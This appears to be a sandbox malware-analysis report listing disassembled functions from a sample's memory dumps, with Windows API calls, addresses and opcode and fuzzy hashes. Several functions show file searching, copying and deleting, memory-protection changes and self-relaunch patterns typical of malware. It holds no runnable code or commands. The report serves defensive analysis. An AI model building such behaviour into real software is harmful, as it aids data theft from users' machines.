API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
Instruction ID: 0bdea2d5ad0990bb33ce136e80e2135baa4f13d2c3666c3c5131773367cbe9ca
Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
Instruction Fuzzy Hash: D7F09632D607119FE733BBE855027ED33919F087E8F14010BD814A61D8DBA45541DF59

Function 0041C742 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041C74E

Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF

__getptd.LIBCMT ref: 0041C765
__amsg_exit.LIBCMT ref: 0041C773
__lock.LIBCMT ref: 0041C783
__updatetlocinfoEx_nolock.LIBCMT ref: 0041C797

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E

Function 00410740 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,007500D8), ref: 0041079A
StrCmpCA.SHLWAPI(00000000,00750158), ref: 00410866
StrCmpCA.SHLWAPI(00000000,007501A8), ref: 0041099D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

`_A, xrefs: 00410A40, 00410A54, 00410803, 0041091B, 00410806, 0041091E, 00410A43

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_A
API String ID: 3722407311-2339250863
Opcode ID: 8a35012189f66fda1be3007d90ae9ffade8581afc9871c19ab20889a1dda6df3
Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
Opcode Fuzzy Hash: 8a35012189f66fda1be3007d90ae9ffade8581afc9871c19ab20889a1dda6df3
Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86

Function 00410765 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,007500D8), ref: 0041079A
StrCmpCA.SHLWAPI(00000000,00750158), ref: 00410866
StrCmpCA.SHLWAPI(00000000,007501A8), ref: 0041099D

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Strings

`_A, xrefs: 00410803, 0041091B, 00410806, 0041091E

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: `_A
API String ID: 3722407311-2339250863
Opcode ID: 421f53d52a56a2bbd4cfe63d0fddeb81e19441a4c74e856354e2cedb9b6df6a4
Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
Opcode Fuzzy Hash: 421f53d52a56a2bbd4cfe63d0fddeb81e19441a4c74e856354e2cedb9b6df6a4
Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86

Function 00414BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
lstrcatA.KERNEL32(?,00781CD8), ref: 00414C08

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00750258,?,000003E8), ref: 00414A4A
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31

Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07

Strings

p&x, xrefs: 00414C15
UaA, xrefs: 00414C2F, 00414C64, 00414C9A, 00414CCF, 00414D05, 00414D3A, 00414D5F, 00414C32, 00414C67, 00414C9D, 00414CD2, 00414D08, 00414D3D

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: UaA$p&x
API String ID: 2104210347-2887491195
Opcode ID: d4d019fcf4fe3232f543370437d2fd56697a017286707ca818daa4a4179e68a4
Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
Opcode Fuzzy Hash: d4d019fcf4fe3232f543370437d2fd56697a017286707ca818daa4a4179e68a4
Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6

Function 022B6897 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022B68CA

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

ShellExecuteEx.SHELL32(0000003C), ref: 022B698D
ExitProcess.KERNEL32 ref: 022B69BC

Strings

<, xrefs: 022B6940

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
Instruction ID: 7546be5d1c18b7dcd411dbb206c58c7a8f09a11a4c4894b84f917d7d20652211
Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
Instruction Fuzzy Hash: 57316BB1911308ABDB15EFE0DD85FDEB77AAF14300F404189E209A6194DF746B88CF69

Function 00416630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

ShellExecuteEx.SHELL32(0000003C), ref: 00416726
ExitProcess.KERNEL32 ref: 00416755

Strings

<, xrefs: 004166D9

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 2a48c5a59bf04772f1499e72b063be6b9ba0683c558070b8fd468f5775b2de20
Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
Opcode Fuzzy Hash: 2a48c5a59bf04772f1499e72b063be6b9ba0683c558070b8fd468f5775b2de20
Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A

Function 00406BE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F

Strings

Jn@, xrefs: 00406C1D, 00406C39, 00406C88, 00406C98, 00406C04, 00406C28, 00406C33
@Jn@, xrefs: 00406C80, 00406C83
Jn@, xrefs: 00406BED, 00406C0D, 00406C8F

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: @Jn@$Jn@$Jn@
API String ID: 544645111-1180188686
Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85

Function 0041A920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041A972
lstrcatA.KERNEL32(00000000), ref: 0041A982

Strings

vI@, xrefs: 0041A929
vI@, xrefs: 0041A937

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: vI@$vI@
API String ID: 3905823039-1245421781
Opcode ID: 960abf7006d12b6f710217112a9391fe63a00ea67513b785fcadcd8b356096d2
Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
Opcode Fuzzy Hash: 960abf7006d12b6f710217112a9391fe63a00ea67513b785fcadcd8b356096d2
Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95

Function 00418D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
wsprintfW.USER32 ref: 00418D78

Strings

%hs, xrefs: 00418D6F

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96

Function 022AA4C7 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022AA548
lstrlen.KERNEL32(00000000,00000000), ref: 022AA666
lstrlen.KERNEL32(00000000), ref: 022AA923

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094

DeleteFileA.KERNEL32(00000000), ref: 022AA9AA

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
Instruction ID: 65fc619d22ac33b741407e94d18353a9fae2cd95dd77ac6b37a7b5994e72ad36
Opcode Fuzzy Hash: 725788eba44463d4c513e2756b6ea09236ad55c473157db14b89c348e9807f7b
Instruction Fuzzy Hash: 8DE1D0729203189BCB16EBE8DD91DEE733ABF25340F508159E156B2198EF346B48CF61

Function 0040A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
lstrlenA.KERNEL32(00000000), ref: 0040A6BC

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

DeleteFileA.KERNEL32(00000000), ref: 0040A743

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
String ID:
API String ID: 257331557-0
Opcode ID: 5c6ea0800f3a75e7701329c3f3b397dedec4f654ee2fbde65a9872b6ed8edf98
Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
Opcode Fuzzy Hash: 5c6ea0800f3a75e7701329c3f3b397dedec4f654ee2fbde65a9872b6ed8edf98
Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A

Function 022AD667 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022AD6E8
lstrlen.KERNEL32(00000000), ref: 022AD8FF
lstrlen.KERNEL32(00000000), ref: 022AD913
DeleteFileA.KERNEL32(00000000), ref: 022AD992

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
Instruction ID: 4501ccb8a522ecfbb706d273c1d526c99681ce8df619899a31d86f2e3cd30174
Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
Instruction Fuzzy Hash: 019112729203089BCB19FBE8DD95DEE733AAF25340F50416DE116A2198EF346B48CF61

Function 0040D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
lstrlenA.KERNEL32(00000000), ref: 0040D698
lstrlenA.KERNEL32(00000000), ref: 0040D6AC
DeleteFileA.KERNEL32(00000000), ref: 0040D72B

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: d27971a4eb4d87530e863e5fa6a2642fa7843bf03f976f7890f67636edeb2d61
Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
Opcode Fuzzy Hash: d27971a4eb4d87530e863e5fa6a2642fa7843bf03f976f7890f67636edeb2d61
Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A

Function 022AD9E7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022ADA68
lstrlen.KERNEL32(00000000), ref: 022ADC06
lstrlen.KERNEL32(00000000), ref: 022ADC1A
DeleteFileA.KERNEL32(00000000), ref: 022ADC99

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
Instruction ID: 96d00b91713f1c0d76f3cbbcc8e21eef1c559ca0443dbd930c084816c7022964
